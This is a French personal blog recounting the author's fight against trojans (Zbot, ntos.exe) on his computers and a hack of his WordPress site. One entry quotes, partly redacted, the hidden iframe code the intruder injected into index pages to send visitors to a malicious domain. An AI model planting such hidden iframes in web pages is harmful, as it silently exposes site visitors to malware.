Débloque-notes

Ce n’est plus un ordinateur, c’est une écurie que j’ai devant moi ! Je viens encore de découvrir deux chevaux de Troie planqués dans du courriel reçu à l’adresse sarod(à)free.fr, heureusement encore inactifs, et dont j’ai pu me débarrasser assez rapidement ce soir malgré un moment de découragement.
Quand je l’ai remarqué je venais en effet de transférer tout mon courrier électronique (sous theBat!) sur l’ordinateur portable afin de pouvoir faire le ménage sur le PC de bureau. Car sur celui-là les problèmes persistent, et pour l’instant aucun des programmes dont je dispose n’arrive à bout de ce troyen, qui lui est actif. Il ne s’agit plus de ntos.exe, mais d’un autre… que certains programmes détectent, d’autres pas.
Trojan-Spy.Zbot
Trojan-Spy.Zbot is a rootkit trojan which steals online banking information and downloads other malware as well. It opens backdoors on infected computer to allow malicious attacker unauthorized access.
Type: TT_Backdoor, TT_Rootkit, TT_Spyw

Timeo Danaos et dona ferentes.

Entretemps c’est Klaas qui s’est généreusement occupé de la mise à jour de la version de WordPress utilisé pour ce bloc-notes. Il était devenu urgent de passer à 2.5 mais malheureusement hors de question pour moi de m’en occuper, pour des raisons de temps et de disponibilité.
Je suis encore loin semble-t-il d’avoir retrouvé le minimum de sérénité requis pour entretenir ces pages, mais une amélioration est en vue.

Les récentes éclipses à répétition de cette page ne laissaient rien présager de bon… chaque fois que je supprimais l’index.htm trafiqué par le très-méchant olthart.com, il réapparaissait quelques heures plus tard.
Un premier changement de mot de passe s’est révélé insuffisant, les attaques se renouvelaient aussitôt.
Grâce à l’aide généreuse de mon ami Klaas (car je n’ai pas trop le temps de m’en occuper moi-même ces jours-ci), on dirait que la fuite a été colmatée, avec cette fois un mot de passe plus robuste que les précédents. Ces opérations m’ont incité à m’interroger sur un curieux message d’erreur de ma machine me donnait en démarrant depuis quelques jours : ntos.exe
Je me disais bien que ça sentait le crottin, le crottin de cheval et plus précisément le cheval de Troie. Et merde ! Comme si je n’avais que ça à faire.
HijackThis confirme la contamination, il trouve la trace de ntos.exe dans les registres, mais ad-aware n’y voit que du feu. Avec d’autres outils soi-disant de sécurité ce n’est guère mieux.
Un cheval qui joue à cache-cache ?

Dans la série « WP m’a tuer » que je croyais terminée, j’ai eu une mauvaise surprise. Ces pages sont restées inaccessibles pendant quelques jours. Faute de temps et de disponibilité je n’ai pu vérifier que ce soir ce qui s’était passé. Il s’agissait apparemment d’une attaque classique avec création et détournement d’une page index.htm à l’aide de deux iframe et détournement de la page index.php existante de Word-Press sur laquelle l’intrus a rajouté ces iframe pour détourner les visiteurs vers un site malveillant :
iframe [...code supprimé] src=’http://olthart.com/imag/in.cgi?2 ‘ [...code supprimé] width=’261′ height=’249′ style=’display:none’> iframe [...code supprimé] src=’http://olthart.com/imag/in.cgi?2 ‘ [...code supprimé] width=’5′ height=’304′ style=’display:none’> /iframe

Il va de soi que j’ai supprimé ce code malveillant avant de remettre en ligne la page index.php de WP.

Il reste à comprendre comment l’intrus est entré sur le serveur. Soit par le FTP, soit par l’entrée administrative de WordPress. Il est possible en effet de modifier le fichier index.php dans Word-Press, mais j’ignore comment dans ce cas il aurait créé le fichier index.htm